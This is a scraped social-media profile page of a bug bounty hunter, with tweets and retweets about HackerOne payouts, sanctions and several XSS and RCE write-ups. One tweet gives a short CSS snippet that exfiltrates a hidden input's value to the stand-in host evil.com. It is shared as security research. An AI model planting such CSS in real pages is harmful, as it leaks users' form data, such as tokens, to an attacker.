skavans
261 posts

skavans
@ska_vans
Bug bounty hunter, programmer. Tweet about interesting cases from my own bughunting weekdays.
Москва, Россия Katılım Haziran 2016
84 Takip Edilen1.1K Takipçiler

How I stopped hunting on @Hacker0x01 after years because they stole my $50k.
#HackerOne #BugBounty
@skavans_/how-i-stopped-hunting-on-hackerone-after-years-because-they-stole-my-50k-and-so-should-you-7328b8af30f1" target="_blank" rel="nofollow noopener">medium.com/@skavans_/how-…
English

@yeswehack @Bugcrowd @GoogleVRP @fbsecurity Folks do any of you plan to continue working with Russian researchers in strict accordance with your policy and following just gov sanctions not your own ones?
English

Improving the impact of a mouse-related XSS with styling and CSS-gadgets link.medium.com/KmM8n8UfAnb
English

🇺🇸 Started a Telegram channel in English with my Bug bounty thoughts, tips and tricks.
t.me/+acAl6cshjlpjO…
🇷🇺 Начал вести Telegram-канал на русском о своем опыте Bug Bounty
t.me/+bAi21VjerxUyM…

@d0nutptr @SecurityMB @PortSwiggerRes
Guys I believe I found a way to simplify css exfiltration from hidden inputs in Chrome. You may be interested :)
English

It's interesting that CSS-exfiltration of "hidden input" value is possible if you make a browser think the input is not hidden.
<input type=hidden value=123>
<style>
input[value^="1"] {display: block; background-image: url(evil.com/1)}
</style>
Works in Chrome 👍
English
skavans retweetledi

To celebrate 10 years of @google's Vulnerability Rewards Programs, we are excited to announce the launch of our new platform: bughunters.google.com!
Learn more about the platform and enhancements to our VRP program here: security.googleblog.com/2021/07/a-new-…
GIF
English
skavans retweetledi
skavans retweetledi

Attack of the clones: Git clients remote code execution blog.blazeinfosec.com/attack-of-the-…
English
skavans retweetledi

From a 500 error to Django admin takeover. A bug worth 3000$
blog.shashank.co/2020/11/from-5…
#BugBounty
English
skavans retweetledi

We've added two new sections on content types to our XSS cheat sheet. They are useful when you can upload a file or control part of the content type header. Big thanks to @Black2Fan for the great research and @shafigullin for the request.
#content-types" target="_blank" rel="nofollow noopener">portswigger.net/web-security/c…
English
skavans retweetledi

“$25K Instagram Almost XSS Filter Link — Facebook Bug Bounty” por Andres Alonso link.medium.com/4kVdtqCTV9
English

